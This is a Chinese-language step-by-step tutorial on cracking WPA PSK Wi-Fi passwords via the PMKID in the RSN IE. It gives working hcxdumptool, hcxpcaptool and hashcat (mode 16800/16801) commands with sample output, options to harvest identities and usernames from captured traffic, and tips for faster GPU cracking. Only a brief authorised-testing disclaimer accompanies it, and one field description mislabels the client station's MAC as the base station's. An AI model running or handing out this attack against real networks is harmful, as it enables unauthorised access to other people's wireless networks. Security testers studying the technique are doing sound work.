WPA PSK密码破解新技术详解

概述

本文介绍一种新型WPA PSK(预共享密钥)密码破解技术，该技术相比传统方法具有显著优势。该技术是在探索WPA3安全标准时偶然发现的，特别适用于启用了漫游功能的802.11i/p/q/r网络。

所需工具

• hcxdumptool v4.2.0或更高版本
• hcxtools v4.2.0或更高版本
• hashcat v4.2.0或更高版本

技术优势

1. 无需普通用户参与（无客户端攻击）
2. 无需等待完整的EAPOL 4次握手
3. 无需重传EAPOL帧
4. 普通用户无需发送无效密码
5. 不受用户或AP距离影响
6. 无需修复nonce和replaycounter值
7. 无需特定输出格式(pcap、hccapx等)

技术原理

该技术利用RSN IE(鲁棒安全网络信息元素)中的PMKID进行攻击。PMKID通过以下方式计算：

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

与传统方法不同，此技术只需从AP获取单个EAPOL帧中的RSN IE数据即可。

攻击步骤详解

第一步：捕获PMKID

使用hcxdumptool从AP请求PMKID：

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

成功捕获时会出现类似输出：

[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

注意：根据WiFi信道状况，可能需要等待最多10分钟才能收到PMKID。

第二步：转换数据格式

使用hcxpcaptool将捕获数据转换为hashcat可接受的格式：

$ ./hcxpcaptool -z test.16800 test.pcapng

输出文件格式示例：

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

各字段含义：

• PMKID (十六进制编码)
• MAC AP (接入点MAC地址)
• MAC Station (基站MAC地址)
• ESSID

可选参数：

• -E 从流量中检索可能的密码和ESSID
• -I 从流量中检索身份信息
• -U 从流量中检索用户名

完整命令示例：

$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

第三步：密码破解

使用hashcat进行破解，模式为16800：

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

模式16801：跳过PMK计算，适用于预先计算PMK的情况。需要64位十六进制编码的PMK列表作为输入。

预先计算PMK可使用hcxkeys工具（需要ESSID）：

$ ./hcxkeys --essid=your_essid --password-list=wordlist.txt --pmk-list=pmklist.txt

性能优化

1. 使用高性能GPU加速破解过程
2. 合理设置hashcat参数（如-w 3为最高性能模式）
3. 预先计算PMK可显著提高速度（模式16801）
4. 使用有针对性的字典文件提高成功率

注意事项

1. 此技术仅用于合法安全测试目的
2. 成功率取决于目标AP是否支持发送PMKID
3. 复杂密码仍需要大量计算资源
4. 建议在授权范围内进行测试

总结

这种新型WPA PSK破解技术通过利用PMKID实现了更高效、更可靠的攻击方式，特别适合现代WiFi网络环境。相比传统方法，它减少了依赖条件，提高了成功率，是无线安全测试领域的重要进展。